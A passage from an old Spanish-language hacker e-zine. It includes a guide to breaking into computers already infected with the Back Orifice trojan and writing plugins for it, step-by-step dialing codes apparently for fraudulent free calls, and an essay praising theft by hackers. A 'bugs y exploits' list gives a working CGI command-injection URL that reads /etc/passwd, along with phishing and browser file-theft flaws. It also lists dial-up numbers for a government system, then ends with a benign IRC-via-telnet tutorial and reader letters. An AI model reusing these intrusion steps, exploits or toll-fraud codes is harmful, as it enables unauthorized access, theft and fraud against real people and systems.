especificado y cierra la conexion
Bueno, ya vemos que se pueden hacer maravillas. Ver epigrafe 9.
8 - Me puedo aprovechar del trabajo de otros?
Por supuesto. Otros ya han hecho la parte mas dura por ti (colar el troyano).
Puedes probar "a ciegas" desde bo cada ip, con el comando host "ip". Si te
funciona el comando dir, esta infectado!!! O sea, que estas dentro.
Parece ser segun http://www.ntbugtraq.com/ que existen por ahi varios
detectores de B.O. (entre ellos el BoSniffer.zip) que son en realidad
troyanos (con el BOServer + el pluggin SpeakEasy). Este troyano intenta un
login en el canal #BO_OWNED de un servidor IRC con un nick aleatorio
informando ademAs de la IP del "afortunado galardonado" con el troyano.
9 - Puedo formatearle el Disco Duro?
Os pido encarecidamente que no os paseis. No hagais putadas.
Robad fotos porno, cread un dir "Pervertido" o "Mehemetidoentuvida".
Intentad acceder al cdrom. Ejecutadle un archivo de sonido.
Que flipe, pero no abuseis.
Si hace un Netstat vera vuestra ip. Y sabeis que con la IP, y la hora en
que ocurrio todo, el ISP y Timonica, de la mano como hermanos, os pueden
recomendar un bello hotelito... lo de siempre, precaucion.
Apendice - Como puedo escribir mi propio plugin para Back Orifice?
(Traduccion del original que acompaa al programa)
Para escribir tu propio plugin para el Back Orifice, solo tienes que crear
una DLL con funciones del tipo:
char *YourFunc(int *active, char *args)
El comando de ejecucion del plugin te permite especificar una dll y un nombre
de funcion del tipo: "dll:_Function". El resto de los parametros son pasados
a tu funcion en los args de los parametros. La unica cosa de la que se ocupa
tu aplicacion es de monitorizar la int al que apunta el activo.
Si ese valor se vuelve 0, el usuario ha pedido que el plugin termine y tu
funcion deberia restablecerse en lo mas rapidamente posible en cuanto se
cierre todo lo que haga falta ser cerrado.
Tu programa puede devolver NULL, o puede devolver a un pointer que apunte a
un bufffer estatico que contenga un mensaje de texto que sera ofrecido al
usuario.
La DLL no se cargara hasta que el texto se copie desde ese buffer.
Y eso es todo lo que hay.
Nota de los autores:
Los acentos se han omitido en aras de la compatibilidad.
La traduccion de la documentacion original ha resultado dificultosa y ha
originado giros linguisticos imposibles. A aquellos mas familiarizados con
textos tecnicos, o que hayan detectado faltas al rigor, se les pide su
colaboracion.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
<>
(Aportacion de Juan Pablo)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Paso 1. Marcar el telfono 629-99-10,
Paso 2. Cuando suene una Voz ...
Paso 3. En seguida Marcar 8019, y
Paso 4. Cuando suene un Tono, en seguida...
Paso 5. Marcar la Lada del Pais y/o Regin , y por ltimo ...
Paso 6. Marcar el Telfono deseado + el botn con la
siguientefigura # (Gato).
CASO II
Paso 1. Marcar el telfono 258-65-01 + el botn con la
siguiente figura#(Gato).
Paso 2. Cuando suene un Tono , enseguida ...
Paso 3. Marcar 02641414866960, despus ...
Paso 4. Marcar la Lada del Pais y/o Regin y por ltimo ...
Paso 5. Marcar el Telfono deseado.
CASO III
Paso 1. Marcar el telfono 725-63-99,
Paso 2. Cuando suene un Tono ...
Paso 3. En seguida Marcar 00.
Paso 4. Esperar otro Tono y ...
Paso 5. En seguida volver a Marcar 00, despus ...
Paso 6. Marcar la Lada del Pas y/o Regin y por ltimo ...
Paso 7. Marcar el telfono deseado.
CASO IV
Paso 1. Marcar el telfono 258-65-01 + el botn con la
siguiente figura# (Gato) .
Paso 2. Cuando suene una voz, en seguida
Paso 3. Marcar 02641414866960, despus ...
Paso 4. Marcar la Lada del Pais y/o Regin y por ltimo ...
Paso 5. Marcar el Telfono deseado.
CASO V - A
Paso 1. Marcar el telfono 420-98-98.
Paso 2. Cuando suene un Tono, en seguida
Paso 3. Marcar 7676, despus ...
Paso 4. Marcar 098 (Lada Internacional) y por ltimo ...
Paso 5. Marcar el Telfono deseado + el botn con la
siguiente figura# (Gato).
CASO V - B
Paso 1. Marcar el telfono 420-98-98.
Paso 2. Cuando suene un Tono, en seguida
Paso 3. Marcar 7676, despus ...
Paso 4. Marcar 095 (Lada USA-CANADA) y por ltimo ...
Paso 5. Marcar el Telfono deseado + el botn con la
siguiente figura# (Gato).
CASO V - C
Paso 1. Marcar el telfono 420-98-98.
Paso 2. Cuando suene un Tono, en seguida
Paso 3. Marcar 7676, despus ...
Paso 4. Marcar 098 (Lada Nacional) y por ltimo ...
Paso 5. Marcar el Telfono deseado + el botn con la
siguiente figura# (Gato).
CASO VI
Paso 1. Marcar el telfono 91-800-01-670.
Paso 2. Cuando suene un Tono, en seguida
Paso 3. Marcar 94678,
Paso 4. Cuando suene un Tono, en seguida
Paso 5. Marcar 55,
Paso 6. Cuando suene un Tono, en seguida
Paso 7. Marcar 98, por ltimo ...
Paso 8. Marcar el Telfono deseado.
NOTA IMPORTANTE : Este Caso (VI) Slo se aplica
en llamadas Internacionales (Europa y el resto del
mundo, exceptuando Estados Unidos y Canada).
CASO VII
Paso 1. Marcar el telfono 722-73-56,
Paso 2. Espere y cuando suene una Voz ...
Paso 3. En seguida Marque 7349,
Paso 4. Espere y cuando suene una voz,
Paso 5. En seguida Marque 7349,
Paso 6. Espere y cuando suene un Tono,
Paso 7. En seguida Marque 0 (cero),
Paso 8. Espere y cuando suene un Tono,
Paso 9. Marque la Lada del Pais y/o Regin , y por ltimo ...
Paso 10. Marque el Telfono deseado.
CASO VIII
Paso 1. Marcar el telfono 91-800-92-450 + el botn con
la siguiente figura#(Gato).
Paso 2. Marcar 100-54 + el botn conla siguiente figura
#(Gato).
Paso 3. Marcar 1054 + el botn conla siguiente figura
#(Gato).
Paso 4. Marcar 00 (cero), despus ...
Paso 5. Marcar la Lada del Pais y/o Regin y por ltimo ...
Paso 6. Marcar el Telfono deseado.
CASO IX
Paso 1. Marcar el telfono 91-800-92-450 + el botn con
la siguiente figura#(Gato).
Paso 2. Marcar 200-26 + el botn conla siguiente figura
#(Gato).
Paso 3. Marcar 2026 + el botn conla siguiente figura
#(Gato).
Paso 4. Marcar 00 (cero), despus ...
Paso 5. Marcar la Lada del Pais y/o Regin y por ltimo ...
Paso 6. Marcar el Telfono deseado.
CASO X
Paso 1. Marcar el telfono 91-800-92-450 + el botn con
la siguiente figura#(Gato).
Paso 2. Marcar 300-31 + el botn conla siguiente figura
#(Gato).
Paso 3. Marcar 3031 + el botn conla siguiente figura
#(Gato).
Paso 4. Marcar 00 (cero), despus ...
Paso 5. Marcar la Lada del Pais y/o Regin y por ltimo ...
Paso 6. Marcar el Telfono deseado.
CASO XI
Paso 1. Marcar el telfono 91-800-92-450 + el botn con
la siguiente figura#(Gato).
Paso 2. Marcar 300-38 + el botn conla siguiente figura
#(Gato).
Paso 3. Marcar 3038 + el botn conla siguiente figura
#(Gato).
Paso 4. Marcar 00 (cero), despus ...
Paso 5. Marcar la Lada del Pais y/o Regin y por ltimo ...
Paso 6. Marcar el Telfono deseado.
CASO XII
Paso 1. Marcar el telfono 91-800-92-450 + el botn con
la siguiente figura#(Gato).
Paso 2. Marcar 300-51 + el botn conla siguiente figura
#(Gato).
Paso 3. Marcar 3051 + el botn conla siguiente figura
#(Gato).
Paso 4. Marcar 00 (cero), despus ...
Paso 5. Marcar la Lada del Pais y/o Regin y por ltimo ...
Paso 6. Marcar el Telfono deseado.
CASO XIII
Paso 1. Marcar el telfono 91-800-92-450 + el botn con
la siguiente figura#(Gato).
Paso 2. Marcar 300-26 + el botn conla siguiente figura
#(Gato).
Paso 3. Marcar 3026 + el botn conla siguiente figura
#(Gato).
Paso 4. Marcar 00 (cero), despus ...
Paso 5. Marcar la Lada del Pais y/o Regin y por ltimo ...
Paso 6. Marcar el Telfono deseado.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
----------------------
--- Reflexiones de nadie --- ---------------
---------------------- -- Por: Mr.Nexus --
---------------
Esta tarde sali a la calle, apareci en el mundo real, como tantas
veces, y como siempre me canse de l.
Vaya un mundo real en el que la gente solo piensa en matarse los unos a
los otros, me da vergenza pertenecer a un grupo de personas asi, por que
diablos tiene que haber tanta violencia en nuestra sociedad?, gente que solo
piensa en hacer dao a los dem s (eso de los fines educativos debe ser una
utopia), y personas? que no tienen m s cerebro que el necesario como para
decir las payasadas que salen por sus bocas, en fin... espero que cuando
crezcan maduren y no se queden tan ... gilipollas.
Por la noche me conecto a la red, por fin! llevaba todo el dia
pensando en lo que iba a hacer, lo que me iba a bajar, lo que iba a probar,
bien! me voy sintiendo como en casa, al fin y al cabo ... esta es mi casa,
aqui es donde me siento bien, donde me siento a gusto con la gente, gente que
aqui no son mas que un apodo que se ponen ellos mismos, son gente ... somos
gente que dejamos atras nuestros prejuicios, nuestros problemas, ...
Pero aaah!, que gran decepcion, ahora Internet se esta expandiendo y
regalan conexiones con las cajas de galletas, qu hace esto?, pues facil
respuesta, esto hace que todo el mundo que tenga ordenador y modem se pueda
conectar, vaya! esto ya no me gusta, empiezo a verme rodeado de esos
gilipollas del mundo real que olvid al entrar en mi mundo. Malditos sean! es
que no se puede estar tranquilo en el IRC, por ejemplo, sin que venga algun
payaso a insultarte, nukearte, ...
La respuesta es no, con lo f cil que es ahora entrar en la red, Toda
esa gentuza indeseable se mete en nuestro mundo, si!, seguro que alguno de
esos cabrones esta leyendo estas lineas y ahora esta diciendo, bufff! Pues
tienes razon, esta conducta no lleva a nada, ... pero cuando apague su
ordenador seguir llendo por ahi con la violencia en las manos y la estupidez
en la cabeza, y mas tarde ... cuando se conecte con el bancotal o con el
bancocual a Internet seguir haciendo lo mismo, pero de otra manera,
aprovechadote de la gente que ha desarrollado nukes (por ejemplo) por el puro
af n de superacion, abusando de la gente que te da el op en algun canal, ...
tan solo son unos pobres hombrecillos.
Hey!, tu!, lector!, acaso no piensas como yo?, dime la verdad, a quien
le interesa ir por ahi molestando a la gente?, ir por ahi tan solo buscando
problemas?, no lo sabes?, yo te lo dir, a los pobres de mente que se dejan
llevar por las modas, por los estereotipos, a los pringaos que solo piensan en
hacer dao a los dem s sin causa aparente.
Hey! no pienses que soy un flojo y un lila, jaja! bueno, un poco si,
... tan solo me gustaria vivir en un mundo en el que no existiera la
violencia, las guerras, el hambre, las masacres de humanos iguales que
nosotros pero con la *mala suerte* de haber nacido en otro lugar; me gustaria
vivir en un mundo sin racismo, sin prejuicios, sin gentuza a la que solo le
interesa su propio beneficio, y a ti? no te gustaria vivir en ese mundo?, si.
Antes ese mundo era el cyberespacio, un sitio bonito, agradable,
curioso, moderno, infinito, ... perfecto, pero entonces llegaron ellos, y nos
tuvieron que joder el invento, ... gentuza ...
Desde aqui tan solo puedo regocijarme en mis pensamiento que, por
ahora, son solo mios, pero tambin puedo decirte que no te rindas amigo
hacker, lo que haces es la aficion mejor remunerada del mundo, como? que no
ganas dinero? ya lo se, pero no se trata de eso verdad? , y ese afan de
superacion? , esa curiosidad satisfecha? eres simplemente admirable, y por eso
quiero ser como tu, tu el hacker, no creo que a nadie le importe que
transfieras a tu cuenta varios millones del dinero que ha acumulado un sucio
chupon que ha explotado a sus trabajadores, o un politico que se ha llenado
sus bolsillos con el dinero de los ciudadanos, creme, nadie reprocharia tal
acto.
Por todo lo que hacen los hackers autenticos, os admiro, admiro a la
gente de Raregazz, porque de veras comparten su conocimiento; admiro a los
componentes de X-ploit, porque reclaman derechos humanos; admiro a Cy de
CyberHack, porque no se calla al criticar a esos que se aprovechan del trabajo
de los dem s; ... y asi a todos aquellos que se esfuerzan en superarse dia a
dia porque sois geniales, hummm, por que no decirlo? Somos geniales, estamos
muy por encima de toda esa gente que solo busca ... bah! tonterias.
Bueno, esto se acaba, sino seguro que te duermes, en fin tan solo Una
ultima cosa, te pido que si *realmente* piensas como yo, ... como nosotros,
unete a nosotros, todavia quedan lugares en la red a los que esta Restringido
el paso a los debiles de mente, se fuerte!, resiste las acometidas de una
sociedad que da asco y rebelate!, tomaremos sus sistemas, exterminaremos las
plagas de bastardos, es contra ellos contra los que tienes que rebelarte! y
cuando te canses, disfruta de la compaia de la buena gente con la que te vas
cruzando a lo largo de tu vida, esos son tus amigos, nosotros somos tus
amigos.
------------------------------------------------------------------------
Para cualquier critica, "Las guerras las declaran los gobiernos
alabanza o correccion: y las sufren los pueblos"
Cristina Almeida (politica Espaola)
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
^-- parece mentira eh? --^
-----------------------------------------------------
------------ Insultos a dev/null --------------
----------------------------------
ͻ
BUGS Y EXPLOITS
por PaTa
ͼ
-*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*-
S.O/Programa: Netscape 3.x y 4.x
Objetivo: DoS usando nested tables demtro de etiquetas span
Parche: -
Creditos: Leonid Ksido
Descripcion: Testeado en Communicator 4.05 en Linux Slackware 3.4, y
Navigator 4.05 en Windows 98
Codigo:
-*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*-
S.O/Programa: CGI-Script
Objetivo: Ejecutar comandos de forma remota
Parche: Quitar `faxsurvey.orig'
Creditos: Tom <
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
>
Descripcion: Existe un bug en el "faxsurvey" CGI-Script, que permite
ejecutar comandos en el servidor HTTP
Versiones afectadas S.u.S.E. 5.1 y 5.2 Linux.
Codigo: http://joepc.linux.elsewhere.org/cgi-
bin/faxsurvey?/bin/cat%20/etc/passwd
-*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*-
S.O/Programa: Linux RedHat 5.1
Objetivo: DoS
Parche: ftp://ftp.solucorp.qc.ca/pub/linuxconf/devel/redhat-
5.1/linuxconf-1.11r19-1.i386.rpm
Creditos: Alex Mottram
Descripcion: Existe un problema de seguridad con linuxconf-1.11.r11-rh3/i386
si lo
actualizas desde el FTP de RedHAT.
Codigo: -
-*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*-
S.O/Programa: HOTMAIL
Objetivo: Obtener las claves de los usuarios
Parche: Descativar Java
Creditos: Tom Cervenka
Descripcion: Mediante al ejecucion de un codigo en java malicioso al leer
los mensajes con el navegador que estemos usando, que fuerza
al usuario a volver a registrarse e introducir de nuevo su
cuenta y su contrasea, sin saber que en realidad esta mandando
al atacante estos datos.
Codigo:
"Go where you want today" - Blue Adept
-*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*-
S.O/Programa: Win98
Objetivo: Efecto 2000
Parche: No encender el ordenador en Noche Vieja
Creditos: -
Descripcion: El bug aparece cuando Windows 98 es reiniciado entre las 23:59
y las 00:00 y hace que el ordenador salte uno o dos dias hacia
atras, de pendiendo de la hora exacta de reset. Por ahora esto
solo ocuure el 31 de Diciembre.
Codigo: -
-*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*-
S.O/Programa: Internet Explorer
Objetivo: Leer ficheros locales
Parche: http://www.microsoft.com/security/bulletins/ms98-013.htm
Creditos: Georgi Guninski
Descripcion: Esta nueva vulnerabilidad permite a una p gian Web diseada
maliciosamente leer archivos de texto o html del ordenador del
usuario y enviar sus contenidos a un host arbitrario, incluso
cuando el usuario se encuentra detr s de un firewall. El
agujero explota un error de seguridad en los frames y se basa
en la utilizacion de instrucciones en JavaScript. Para que
funcione se debe conocer de antemano el nombre y camino
completo del fichero que se quiere leer, cosa nomuy dificil.
Versiones afectadas:
- Microsoft Internet Explorer 4.0, 4.01 y 4.01 SP1 sobre
Windows NT 4.0, Windows 95
- Microsoft Windows 98, Internet Explorer iontegrado
(version 4.01 SP1)
- Microsoft Internet Explorer 4.0 y 4.01 para Windows 3.1
y Windows NT 3.51
- Microsoft Internet Explorer 4.0 y 4.01 para Macintosh
- Microsoft Internet Explorer 3.x
Codigo:
Read text/HTML file with Internet Explorer
4.01>
This demonstrates a bug in IE 4.01 under Windows 95 (don't know for other
versions), which allows reading text or HTML file on the user's machine.
Create the file c:\test.txt and its contents are shown in a message
box. The file may be sent to an arbitrary server even if behind a firewall.
To test it, you need Javascript enabled.
This file is created by Georgi Guninski.
[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]
$$$$$ $$
"$$$$$$$$$$$$$$$" $$ ooo $$$$$ooo oooo
"$$$$$$$$$$" "$$" o$$ $$o "$$$$$$$$$ $$$$$$$$$$
$$ "$$$$$$" $$ $$oo $$$$$$$$$$o """ o$$$"
$$$o "$$$$" $$$ o$$" $$$"""$$"" $$$ oooo
$$$$oo $$$$ $$$$$ ooo$$$ooo $$$oooo$$$ o$$$ooooooo$$$$$$$$$
$$$$$$$ooo $$ ooo$$$$$$$ """""""" """""" """""""" """"""""""
$$$$$$$$$$$$$$$$$$$$$$$$$$ oooo ooo
$$$$$$$""" $$o """$$$$$$$ ""$$ $$$$
$$$$"" $$$o ""$$$$ $$$oooo $$$$$$$o oooooo $$$ oooooo
$$$" o$$$$o "$$$ "$$$$""$$o "$$$$ o$$""$$$$ $$" $$$"""
$$ o$$$$$$$ $$ $$$$ $$$ "$$$$""$$$$ $$$ "" $$$$$$ ""
o$$$$$$$$$$o $$$ $$o $$$o o$$$$o $$$ $$"" $$o
o$$$$$$$$$$$$$$$$o o$$$$$ $$$$$ """" """""" "$$$$$$$" $$$$ $$$$$o
\/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\/
Pues bien, aqui esta de nuevo esta vieja seccion, espero que les guste y
que me ayuden a mantenerla viva.....
Lo que sigue es un sistema que al parecer los seores de X-ploit TEAM lo han
de conocer muy bien, es cenids.ssa.gob.mx y aqui esta una lista de telefonos
y velocidades a las que puedes conectarte:
14,400 bps : 9,600 bps: 2,400 bps:
563-8471 598-7761 598-1467
563-7895 598-1010 598-4208
563-8405
563-9404
Bueno pues por esta ocasion eso es todo, esperamos contar con su apoyo
para hacer crecer esta seccion.
[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]
------------------------------
Accediendo al IRC por telnet
por Senpai
------------------------------
Alguna vez has pensado como se comunica tu cliente de IRC (el mIRC por ej.)
con el servidor de IRC?. No? Yo tampoco hasta que tuve una conversacion en
la Under con jcl (un saludo chavalote!).
Conectarse al IRC con el telnet
-------------------------------
Si te conectas al IRC via telnet, puedes saber exactamente que cosas le
envias al servidor, y que cosas te envia el servidor a ti, con un cliente de
irc todo esto lo pierdes, simplemente te conectas, chateas un rato, y te vas;
pero como estamos aprendiendo lo mejor es saber como funcionan las cosas, y
no hacer como si fueran una "caja negra" de donde entran y salen mensajes.
Vamos a la practica
-------------------
Lo primero que quiere de ti un servidor de IRC es un password (opcional), y
un nick. Una vez le has proporcionado estos datos, te envia un ping al que
tienes que responder (si no respondes te desconecta!), y despues de hacer
esto le tienes que enviar un mensaje identificando el usuario (tu).
Vamos a ver esto con un ejemplo real:
Ejecuta algun programa de telnet, y haz telnet al servidor de IRC. Tendras
que usar algun puerto que tengan destinado a IRC (normalmente el 6667 lo
tienen todos disponible).
Una vez hecho esto, te conectara, pero no aparece nada por pantalla.
Dale un password (el que quieras, da igual). La sintaxis es:
PASS password
Ej:
PASS hola
Despues le das el nick que quieras.
Sintaxis: NICK nick
Ej:
NICK pableras
Si el nick esta ocupado el servidor te enviara un mensaje para que pongas
otro.
Una vez el servidor acepta el nick, te envia un PING con un numerito, algo
asi:
PING :11528997809137948565
y tu te tienes que responder con un PONG y el numerito. Escribe:
PONG 11528997809137948565
Date prisa en responder, porque si no te desconecta por "ping timeout".
El servidor te enviara un ping de este tipo de forma periodica mientras
estes conectado, cada vez que te envie uno, tienes que responderlo, que si
no te desconecta.
Una vez echo esto le tienes que enviar un mensaje de USER.
Sintaxis: USER NombreDeUsuario NombreDelHost NombreDelServidor NombreReal
Atencion al poner el nombre real, debes poner dos puntos(:) antes.
Ej:
USER pepe aki alli :Pepito de los palotes
Una vez hecho esto te enviara un mensaje de bienvenida.
Esto es un trozo de un log real:
pass dsthgdi
nick pep_1
PING :11528277839637248565
pong 11528277839637248565
user sol solo sol :TO
:fenix.irc-hispano.org 001 pep_1 :Welcome to the Internet Relay Network pep_1
:fenix.irc-hispano.org 002 pep_1 :Your host is fenix.irc-hispano.org, running version u2.9.32
:fenix.irc-hispano.org 003 pep_1 :This server was created Fri Feb 7 1997 at 17:07:32 MET
:fenix.irc-hispano.org 004 pep_1 fenix.irc-hispano.org u2.9.32 dioswk biklmnopstv
:fenix.irc-hispano.org 251 pep_1 :There are 2151 users and 1382 invisible on 21servers
:fenix.irc-hispano.org 252 pep_1 7 :operator(s) online
:fenix.irc-hispano.org 253 pep_1 6 :unknown connection(s)
:fenix.irc-hispano.org 254 pep_1 1185 :channels formed
:fenix.irc-hispano.org 255 pep_1 :I have 359 clients and 1 servers
:fenix.irc-hispano.org NOTICE pep_1 :Highest connection count: 690 (689 clients)
:fenix.irc-hispano.org 375 pep_1 :- fenix.irc-hispano.org Message of the Day
:fenix.irc-hispano.org 372 pep_1 :- 14/10/1997 12:21
:fenix.irc-hispano.org 372 pep_1 :-
:fenix.irc-hispano.org 372 pep_1 :- Bienvenidos al servidor de IRC de Arrakis
:fenix.irc-hispano.org 372 pep_1 :-
:fenix.irc-hispano.org 372 pep_1 :- -----------------------------------------
.
.
Aqui siguen muchas lineas de bienvenida..
.
.
:fenix.irc-hispano.org 372 pep_1 :-
:fenix.irc-hispano.org 372 pep_1 :- Esta es la politica de este servidor:
:fenix.irc-hispano.org 372 pep_1 :- puertos 6665, 6666, 6667, 6668 y 6669.
:fenix.irc-hispano.org 372 pep_1 :- Por favor repartiros por estos puertos, :fenix.irc-hispano.org 372 pep_1 :- con ello. Gracias.
:fenix.irc-hispano.org 372 pep_1 :-
------------------------------------------
:fenix.irc-hispano.org 376 pep_1 :End of /MOTD command.
Por fin! ya estamos conectados! Con el mIRC es mas facil eh....
Ahora ya estamos conectados al IRC, solo nos falta entrar en algun canal a
ver lo que se cuece no?, pues vamos alla.
El comando para entrar es JOIN canal.
Ej:
JOIN #el_amor_universal
Una vez entramos dentro de un canal empezaremos a ver lo que se esta hablando
Ahi va otro pedazo de log como ejemplo:
join #mexicano
:pep_1!~
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
JOIN :#mexicano
:fenix.irc-hispano.org 332 pep_1 #mexicano :joroa que joroa
:fenix.irc-hispano.org 333 pep_1 #mexicano Rommel 908311068
:fenix.irc-hispano.org 353 pep_1 = #mexicano :pep_1 @senpai @ChemiX @Rommel
@Thays @Scytale
:fenix.irc-hispano.org 366 pep_1 #mexicano :End of /NAMES list.
:Scytale!
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
NOTICE pep_1 :Bienvenido a #mexicano. El dia 3 este canal estara cerrado con motivo de la huelga de Internet. Secundala! Joroa que Joroa!
:Rommel!
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
PRIVMSG #mexicano :yo no lo hubiera dich
o mejor....
:Thays!
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
PRIVMSG #mexicano :que sabemos lo que se pierde
:Mendes!
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
JOIN :#mexicano
:Mendes!
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
NICK :Mefisto
En este log puedes ver que cuando te unes a un canal te sale una lista con
la gente que hay en el canal, y te envian el NOTICE del canal.
Tambien se puede ver al final como entra un nuevo usuario (Mendes) al canal.
Mas cosas....
Ya nos hemos conectado al servidor IRC y estamos dentro de un canal, y
ahora el paso logico es chatear!.
El comando para enviar mensajes es PRIVMSG
PRIVMSG destino1,destino2,.. Mensaje
En destino puedes poner un nick o un canal o una lista de ellos.
El mensaje ha de ir precedido por los dos puntos (:)
Ej:
PRIVMSG pepe :Hola pepe me recibes?
PRIVMSG #amor :Busco chica para relacion formal...
Creo que se pilla el concepto no?
Bueno voy a dejarme de chateo y voy a ver que hay por ahi...
Prueba a darle al comando HELP, te saldra algo como:
help
:fenix.irc-hispano.org NOTICE pep_1 :PRIVMSG
:fenix.irc-hispano.org NOTICE pep_1 :NICK
:fenix.irc-hispano.org NOTICE pep_1 :NOTICE
:fenix.irc-hispano.org NOTICE pep_1 :JOIN
:fenix.irc-hispano.org NOTICE pep_1 :MODE
:fenix.irc-hispano.org NOTICE pep_1 :QUIT
:fenix.irc-hispano.org NOTICE pep_1 :PART
:fenix.irc-hispano.org NOTICE pep_1 :TOPIC
.
.
Un monton de comandos mas.....
.
.
:fenix.irc-hispano.org NOTICE pep_1 :INVITE
:fenix.irc-hispano.org NOTICE pep_1 :KICK
:fenix.irc-hispano.org NOTICE pep_1 :WALLOPS
:fenix.irc-hispano.org NOTICE pep_1 :PING
:fenix.irc-hispano.org NOTICE pep_1 :PONG
:fenix.irc-hispano.org NOTICE pep_1 :SILENCE
:fenix.irc-hispano.org NOTICE pep_1 :GLINE
:fenix.irc-hispano.org NOTICE pep_1 :NOTE
:fenix.irc-hispano.org NOTICE pep_1 :SERVICE
:fenix.irc-hispano.org NOTICE pep_1 :HASH
:fenix.irc-hispano.org NOTICE pep_1 :DNS
:fenix.irc-hispano.org NOTICE pep_1 :REHASH
:fenix.irc-hispano.org NOTICE pep_1 :RESTART
:fenix.irc-hispano.org NOTICE pep_1 :DIE
Estos son los comandos que tiene implementados el servidor de IRC.
Si has leido hasta aki te preguntaras, y para que quiero yo conectarme al
IRC con el telnet??? Si con mi cliente me complico menos la vida!
Pues para aprender, solo eso. Ademas si algun dia te interesa programar un
cliente para IRC, necesitaras saber como funciona no?
Ademas, si echamos a volar un poco la imaginacion... si tenemos la IP de un
operador, y enviaramos paquetes con ordenes con la ip del operador.. no
tendriamos sus privilegios? podriamos ser operadores en todos los canales...
incluso podriamos ser IrCops haciendonos pasar por ellos falseando nuestra
ip, no?
Pero esto plantea nuevos problemas... hay que averiguar desde que puertos se
conecta el operador, el servidor que usa, los numeros de secuencia de los
paquetes tal vez?
Esto os lo dejo a vuestra imaginacion.
Hay muchisimos mas comandos en IRC, pero con esto que he contado tienes
suficiente para empezar a experimentar.
Si a alguien le interesa el tema hare una segunda entrega con explicacion a
mas comandos y un pokito mas del tema del spoofing en irc, asi que mandadme
mails si os interesa todo esto.
Tengo que agradecer a jcl que me despertara el interes sobre el tema del IRC
que era algo que tenia completamente apagado...
Si os interesa el tema mi email es:
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
ahi podeis enviar
vuestras sugerencias y criticas a mi articulo (esta hecho en un tiempo record
de 30 minutos asi que seguro que tiene fallos).
Para profundizar mas sobre el tema os recomiendo que os leais la RFC 1459.
/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\
*/*\/*\/*\/*\/*\/*\/*\*
/ \
*|* CARTAS DEL LECTOR *|*
*|* ----------------- *|*
\ /
*\*/\*/\*/\*/\*/\*/\*/*
_______________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
A parte de felicitarles por su revista, y decirles ke se den un paseito
por el web de abajo del todo (si el ke pone Necronomicon...), y se miren
la Guia de Temas Olvidados y se meten a Aadir un Enlace y me rellenen
el formulario, porke me gustaria ponerles un link en esa seccion dentro
de Red, pero no se ke descripcion ponerles. Asi ke solo dense una vuelta
me envian el formulario y chapooo...
Pasando al tema ke keria comunicarles... Seguro ke no conocian la
existencia de la Red de IRC Union Latina, pero fijo ke si conocian el
IRC-Hispano. Pues nada pasarles los servers de la Red de IRC Union
Latina:
Union Latina: Comunet (ES, Bilbao): comunet.unionlatina.org
Union Latina: Digital (ES, Madrid): madrid.unionlatina.org
Union Latina: Dragonet (ES, Alicante): dragonet.unionlatina.org
Union Latina: Interlink (ES, Madrid): interlink.unionlatina.org
Union Latina: Lander (ES, Madrid): lander.unionlatina.org
Union Latina: Telebase (ES, Alicante): telebase.unionlatina.org
Union Latina: Tinet (ES, Tarragona): tinet.unionlatina.org
Su web oficial es:
http://www.unionlatina.org
Y el Bot de esta Red es KaOs. Ke porke les interesaria esta red????...
pueee. porke es una red alternativa al IRC-Hispano y no hay IRCops
fascista como en la otra... Aunke es una pena antes habia un server de
Mexico y otro de Puerto Rico, pero se han caido y no creo ke vuelvan...
Por cierto si conocen por alla el otro lado del charco, algun server ke
pudiera unirse a Union Latina comunikenmelo ke yo se lo digo a un par de
IRCops... Siguiendo con el tema... pues ke keremos ke esta sea la red
donde hablen todos los hispanos del mundo... asi ke ya saben a darse
una vuelta por la red...
Pueee nada maxxxx... espero ke si pueden lo comuniken en su e-zine, pa
ke la gente sepa ke hay otras redes Hispanas aparte del IRC-Hispano...
Ale... ke sigan tan bien con su e-zine... y ke no decaigan...
Mushas GraciaX por todo... se despide un espaolito de ustedes...
[ Tomad nota todos los IRCmaniacos ... seguro que la red latina esta
genial ... no lo olvideis ... ]
_______________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
amigos de RareGazz :
HIzes desde ARGENTINA
